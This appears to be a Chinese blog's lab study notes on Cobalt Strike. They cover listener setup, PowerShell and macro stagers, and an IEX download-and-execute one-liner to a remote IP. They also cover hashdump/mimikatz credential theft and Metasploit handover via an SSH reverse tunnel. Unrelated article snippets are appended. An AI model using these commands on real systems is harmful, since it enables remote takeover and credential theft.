Cobaltstrike常用功能
一、快捷工具栏
3、需要创建监听器,才能让靶机上线,连接我们公网服务端上去开启的帧监听端口,做任何操作
都是通过服务器的IP地址去连接靶机,去和靶机进行文件stage的一个传输和交互。这里推荐把cs
放到公网上边,比较方便让靶机上线。
4-6单个视图
11、payload分为stage和stageless(相当于php大马,拥有所有的功能,包括meterpreter,很大,不
需其他的管理器就能实现完全的交互,网络环境比较差的时候可以使用它,大并且容易查杀)
12、已淘汰
13、生成恶意Office宏攻击,嵌入恶意宏攻击。
14、建立web_delivery是在内存上执行恶意代码,不会再服务器上留下文件的。
查看进程:ps aux | grep teamserver
kali -9 进程 干掉进程
sudo yum install java-11-openjdk-devel(cs4.3版本java11环境)
sudo yum list installed | grep java(查看已安装java)
sudo alternatives --config java (切换环境)
java -version(查看版本)
export JAVA_HOME=$(dirname $(dirname $(readlink -f $(which java))))
echo $JAVA_HOME 设置环境变量(此两条命令直接在命令行执行)
sudo lsof -i :50050 查看端口状态
./msg 用户名 信息(发送给指定用户)
二、创建监听器listener
点击Cobalt strike——监听器——add
获取靶机上线stager,任何靶机上线都是通过服务端
查看端口是否在线 netstat -ano |grep 8080
三、学习:cobaltrike实战演示1:
创建完监听器后,想让靶机上线(那就攻击靶机)
云服务器用作实验的话,如果安全组不需要特定要求,直接放通全部
靶机上线操作:
选择前边设置的监听器和方法(这里的方法我是用的是powershell)
选择文件保存位置,这里我保存到桌面为了方便(这个是windows10做的客户端)
之后需要再开启一个端口,让靶机可以下载这个文件,使用web-drive-by的host file,选择刚刚生
成的文件
复制下边内容
http://39.99.136.38:9090/download/file.ext
在靶机里边执行 (这使用的是windows7 64位操作系统)
此时靶机已上线
上线之后可以靶机进行一系列的控制
这里是默认60秒的心跳间隔(真实环境可以不修改,容易被ids查杀)
①设置时间间隔
②在beacon中 sleep 2亦可以设置
靶机想要下线就把进程(process)关掉,在这个界面退出会再次上线
shell ipconfig 命令
help 可以查看我们能执行的一些命令
重要模块
②转移③内存中获取密码④不建议开启(vps带宽较小,很卡)
screenshot截屏
在视图界面可以查看
亦可以端口扫描和查看进程
四、学习:cobaltrike实战演示2:
其他的监听器和attack进行一个主机上线,如下:
设置端口,监听器(同样如上执行,可以上线)
删除我们开启的东西
①mamager web server
②attacks ——web-driver-by ——manager
这如果在设置的时候没有copy,这里也是可以copy的
想关掉,直接选中,点击kill
端口扫描完可做如下操作:(三个视图模式)
脚本可以github搜,选择一个路径导入cna,成功会显示ready(√)
五、学习:cobaltrike攻击流程:
拿root和system权限
选择监听器和利用脚本
自动打出去
两个用户是不一样的
①hashdump命令或者②右击——执行——hash(读取用户哈希值)或者③右键run mimikatz's
此时在任务管理器运行着powwershell.exe把它杀死了就没了(可以利用msf做进程迁移)
先右击exit和remove把靶机移除掉(新操作)(因为直接remove会在自动上线)
比较安全
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://35.12.32.156:9091/a'))"复制此代码到靶机去执行
此处是dvwa靶场
此时靶机又上线了
靶机上线方法:
①命令执行②文件上传,上传webshell(工具执行连接),无报错有权限执行,靶机即可上线(如果
cs是在内网中的,确定靶机能够连到cs)
六、学习:cs和msf联动
1、cs联动msf之socks代理(访问内网或者无法直接访问的服务器就需要建立代理)
2、cs联动msf之外部监听器
3、练习
1、介绍:
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各
类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。
meterpreter的功能十分强大,模块非常多,攻击,辅助,编码等等,cs进行团队合作,进行主机
的上线和smb的横向移动(内网管控平台)
环境搭建条件:
①cs客户端一台windows10操作系统,一台centos7操作系统(或者kali操作系统也行)
②一台云服务器作为cs服务器(公网上vps)
③一台windows7(可联网),一台windows2012(不联网)
操作步骤:
①socks 端口(如 socks 1234)
可以在vps查看(netstat -ano|grep 1234)是否是监听状态
如何连接代理(代理是对服务端的,客户端只是连接服务器,所有的操作都是在服务端即vps操作
的)
复制上述命令转到msf中执行
此时整个msf就被代理到了1234端口,此时进行辅助端口扫描
非常慢
kali中操作
在文件中写入如下内容保存
此时还ping不了(ping在tcp/ip上一层(icmp)不能对ping代理转发,namp可以进行no ping 扫
描)
此时会很慢(因为走代理)
虚拟机——物理网卡——运营商交换机——路由——vps服务器(此时就可扫描重要端口,不全
扫)
结果如下:
2、学习:cs联动msf之外部监听器
①创建一个新的linstener
转移时会开
把system的sesion发给metetpreter
kali中
将cs服务器的session发送到cs客户端也就是meterpreter(kali这一端)
外网ping不通内网(即cs服务器无法通cs客户端)做代理转发
保存退出
重启生效(有隧道转发功能)
执行此命令就可代理转发
此时内网的8085端口和vps的8085端口就通了(去看拓扑图)
选择上线的主机——右键span转移——选择监听器——外部的http8085
拿到meterpreter
3、实操:操作步骤:
这里是提权一下后的ssystem权限的用户
①在vps中 vi /etc/ssh/sshd_config(sshd_config是服务端配置文件)
②AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes
PasswordAuthentication yes
③systemctl restart sshd.service或者systemctl restart sshd(这样才有隧道转发的功能)
④回到本地的 kali 中,通过 ssh 隧道做转发
创建ssh隧道常用的参数:
-C:压缩传输,提供传输速度
-f :将ssh传输转入后台执行,不占用当前的shell
-N:建立静默连接(建立了连接,但是看不到具体会话)
-g:允许远程主机连接本地用于转发的端口
-L:本地端口转发
-R:远程端口转发
-D:动态转发
-P指定ssh端口
⑤命令执行:ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22
含义解释:通过 119.xx.xx.xx 机器把外部的 8085 端口上的流量转到本地192.168.129.139 的 8085
端口上,而本地的 8085 端口上跑的又的监听器,所以,最终才造成 meterpreter本地上线的效
果。
⑥netstat -anltup 查看正在工作的端口
⑦netstat -tulnp |grep 8085查看服务器是否开启8085端口
此处有错误可以查杀pid kill pid即可(ssh)
⑧创建一个新的监听器
⑨在kali中启用msfconsole,设置参数
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.129.139
set lport 9999
show options
run
⑩ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22
最好检查一下是否设置成功:netstat -anltup(没有问题做如下操作)
等待stage发送
此时拿到了meterpreter(这个不知道是抽了什么风,重启虚拟机之后,我搞了两次才出来,多次
尝试)比较卡,此时可以拿shell(如果显示乱码 chcp 65001),进程迁移,exit退出
一、快捷工具栏
二、创建监听器listener
三、学习:cobaltrike实战演示1:
四、学习:cobaltrike实战演示2:
五、学习:cobaltrike攻击流程:
六、学习:cs和msf联动
1、介绍:
2、学习:cs联动msf之外部监听器
3、实操:操作步骤:
相关文章:
Cobaltstrike常用功能
一、快捷工具栏 3、需要创建监听器,才能让靶机上线,连接我们公网服务端上去开启的帧监听端口,做任何操作 都是通过服务器的IP地址去连接靶机,去和靶机进行文件stage的一个传输和交互。这里推荐把cs 放到公网上边,比较…...
UWP与WPF:微软两大UI框架
在微软的开发者生态系统中,UWP(Universal Windows Platform)与WPF(Windows Presentation Foundation)是构建Windows应用的两大明星框架。它们各自携带独特的设计理念和技术特性,服务于不同的开发需求和应用场景。本文将深入探讨这两者之间的异同…...
【面试】字节码文件是跨平台的吗?
目录 1. 说明 1. 说明 1.字节码文件(.class文件)是跨平台的。2.字节码文件是Java源代码经过Java编译器(javac)编译后生成的中间代码文件,这些包含了Java虚拟机(JVM)指令,而不是特定…...
SpringCloud中注册中心Nacos的下载与使用步骤
1.前言 Nacos(Dynamic Naming and Configuration Service)是阿里巴巴开源的一款服务发现和配置管理工具。它可以帮助用户自动化地进行服务注册、发现和配置管理,是面向微服务架构的一个重要组成部分。 2.下载 链接:https://pan.b…...
心缘Hub小程序
心缘Hub小程序 文章目录 心缘Hub小程序[TOC](文章目录) 前言飞书文章:[添加链接描述](https://mqdyd6qj756.feishu.cn/wiki/X9qbwrq70i43W0kr5X8cqytSnKb) 一、简介 前言 飞书文章:添加链接描述 一、简介 心缘Hub 不要钱可以匹配 有缘人 、直接拿微信…...
攻防世界maze做法(迷宫题)
首先查壳64bit,直接丢进ida64中进行反编译就完事儿了,然后直接进入main函数打注释分析首先,题目已经提示了这是个迷宫题,我们抓住做迷宫题的两个要点,一找玩法,二找地图, 玩法在主函数中&#…...
PID——调参的步骤
第一步:确定比例增益P 确定比例增益 P 时,首先去掉 PID 的积分项和微分项,一般是令 Ti0、 Td0(具体见PID 的参数设定说明),使PID 为纯比例调节。 输入设定为系统允许的最大值60%~70%,由0逐渐加…...
Deno入门:Node.js的现代替代品
Deno 作为 Node.js 的现代替代品,提供了许多改进和创新,尤其是在安全性、模块系统和开发体验方面。虽然它仍处于发展阶段,但对于寻求简洁、安全和现代化 JavaScript/TypeScript 开发环境的开发者来说,Deno 是一个值得考虑的选择。…...
WIFI 万[néng]钥匙 v5.0.10/v4.9.80 SVIP版!
WiFi Master Key v5.0.10/v4.9.80 WIFI万[Nng]钥匙APP是一款专业的网络连接工具,设计宗旨在于为用户提供方便快捷的WiFi接入方案。本应用集成了覆盖全国的大量免费WiFi热点信息,确保用户能够在不同地区快速而稳定地连接到互联网。此外,该应用…...
JCR一区级 | Matlab实现TCN-BiLSTM-MATT时间卷积双向长短期记忆神经网络多特征分类预测
JCR一区级 | Matlab实现TCN-BiLSTM-MATT时间卷积双向长短期记忆神经网络多特征分类预测 目录 JCR一区级 | Matlab实现TCN-BiLSTM-MATT时间卷积双向长短期记忆神经网络多特征分类预测分类效果基本介绍程序设计参考资料 分类效果 基本介绍 1.JMatlab实现TCN-BiLSTM-MATT时间卷积双…...
redis之发布与订阅
华子目录 什么是发布与订阅?常用命令psubscribe pattern1 [pattern2...]subscribe channel1 [channel2...]publish channel messagepunsubscribe pattern1 [pattern2...]unsubscribe [channel1 [channel2...]]pubsub subcommand argument1 [argument2...] 示例1示例…...
LLM主流开源代表模型
LLM主流开源大模型介绍 1 LLM主流大模型类别 随着ChatGPT迅速火爆,引发了大模型的时代变革,国内外各大公司也快速跟进生成式AI市场,近百款大模型发布及应用。 目前,市面上已经开源了各种类型的大语言模型,本章节我们…...
Openharmony的usb从框架到hdf驱动流程梳理
HDF框架实现了用户层与内核层进行通信的管理框架,关于其简易通信示例在以下两篇博文中有所介绍, 一个例子了解通过Openharmony的HDF框架实现简易驱动的流程https://blog.csdn.net/procedurecode/article/details/128906246 Openharmony的用户态应用通过HDF框架驱动消息机制…...
Apache Doris 基础 -- 数据表设计(数据模型)
Versions: 2.1 1、模型概览 本主题从逻辑角度介绍了Doris中的数据模型,以便您可以在不同的业务场景中更好地使用Doris。 基本概念 本文主要从逻辑的角度描述Doris的数据模型,旨在帮助用户在不同的场景更好地利用Doris。 在Doris中,数据在…...
“雪糕刺客”爆改“红薯刺客”,钟薛高给了消费品牌哪些启示?
夏日袭来,一支价格高昂却让人眼前一亮的雪糕,曾一度成为市场热议的焦点。然而,随着消费者对性价比的日益关注,曾经的“雪糕刺客”钟薛高,其创始人林盛近期以直播带货红薯开启他的还债之路,高打情怀“直播自…...
多输入多输出非线性对象的模型预测控制—Matlab实现
本示例展示了如何在 Simulink 中设计多输入多输出对象的闭环模型预测控制。该对象有三个操纵变量和两个测量输出。 一、非线性对象的线性化 运行该示例需要同时安装 Simulink 和 Simulink Control Design。 % 检查是否同时安装了 Simulink 和 Simulink Control Design if ~m…...
多项分布模拟及 Seaborn 可视化教程
多项分布 简介 多项分布是二项分布的推广,它描述了在 n 次独立试验中,k 种不同事件分别出现次数的离散概率分布。与二项分布只能有两种结果(例如成功/失败)不同,多项分布可以有 k 种(k ≥ 2)及…...
学计算机,我错了吗?
今天,我的一位朋友告诉我,终于找到一家小公司入职,年前 1 月辞职,本想休息一段时间,没成想,休息到 6 月份,现在程序员真的越来越难找工作了。 肯定有人在想,现在这种行情࿰…...
学习小心意——简单的循坏语句
for循坏 基本语法格式 for 变量 in 序列:代码块 示例代码如下 for i in range(10):print(i)#输出结果:0 1 2 3 4 5 6 7 8 9 简单案例代码如下 利用for语句遍历序列 # 遍历字符串打印每个字母 for letter in "python":print(letter)# 遍历列表并打印每个元素 a …...
C++ 类方法解析:内外定义、参数、访问控制与静态方法详解
C 类方法 类方法,也称为成员函数,是属于类的函数。它们用于操作或查询类数据,并封装在类定义中。类方法可以分为两种类型: 类内定义方法: 直接在类定义内部声明和定义方法。类外定义方法: 在类定义内部声明方法,并在…...
pytorch+YOLOv8-1
1.工具开发 2.idea配置pytorch环境 默认安装新版本torch pip install torch 3.pytorch验证 4. print(torch.cuda.is_available()) 输出结果为 False 说明我只能用cpu...
JavaScript 基础 - 对象
对象 对象是一种无序的数据集合,可以详细的描述描述某个事物。 注意数组是有序的数据集合。它由属性和方法两部分构成。 语法 声明一个对象类型的变量与之前声明一个数值或字符串类型的变量没有本质上的区别。 <script>let 对象名 {属性名:属性值…...
代码随想录第23天|回溯part3 组合与分割
39.组合总和 class Solution { public:vector<vector<int>> res;vector<int> path;void backTracking(vector<int>& candidates,int target,int sum,int n,int step){if(n > 150) return;if(sum > target) return;if(sum target){res.push_…...
nginx和proxy_protocol协议
目录 1. 引言2. HTTP server的配置3. Stream server的配置3.1 作为proxy_protocol的前端服务器3.2 作为proxy_protocol的后端服务器1. 引言 proxy_protocol 是haproxy开发的一种用于在代理服务器和后端服务器之间传递客户端连接信息的协议。使用 proxy_protocol 的主要优势是能…...
【pytorch】数据转换/增强后保存
数据转换 from PIL import Image from pathlib import Path import matplotlib.pyplot as plt import numpy as npimport torch import torchvision.transforms as Tplt.rcParams["savefig.bbox"] = tight # orig_im...
超越Devin!姚班带队,他们创大模型编程新世界纪录
超越Devin!SWEBench排行榜上迎来了新玩家—— StarShip CodeGen Agent,姚班带队初创公司OpenCSG出品,以23.67%的成绩获得全球第二名的成绩。 同时创造了非GPT-4o基模的最高纪录(SOTA)。 我们都知道,SWEBe…...
江苏大信环境科技有限公司:环保领域的开拓者与引领者
2009 年,江苏大信环境科技有限公司在宜兴环保科技工业园成立。自创立之始,该公司便笃定坚守“诚信为本、以质量求生存、以创新谋发展”这一经营理念,全力以赴为客户构建专业的工业有机废气治理整体解决方案,进而成为国家高新技术企…...
关于 Bean 容器的注入方式,99 % 的人都答不全!
引言:在使用 Spring 框架开发应用程序时,依赖注入是一个至关重要的概念。而对于 Bean 容器的注入方式,虽然我们可能都有一定的了解,但实际上很多人在被问及这个问题时可能并不能完整地回答。本文将深入探讨 Spring 中 Bean 容器的…...
Spring的@Async注解及其用途
Spring 的 Async 注解是 Spring Framework 4.2 版本引入的功能,它用于支持异步方法执行。当一个方法标注了 Async,Spring 会在一个单独的线程中调用该方法,从而不会阻塞主线程的执行。 Async 注解的用途: 提高性能:通…...
JS(DOM、事件)
DOM 概念:Document Object Model,文档对象模型。将标记语言的各个组成部分封装为对应的对象: Document:整个文档对象Element:元素对象Attribute:属性对象Text:文本对象Comment:注释对象 JavaScript通过DOM,就能够对HTML进行操作: 改变 HTML 元素的内…...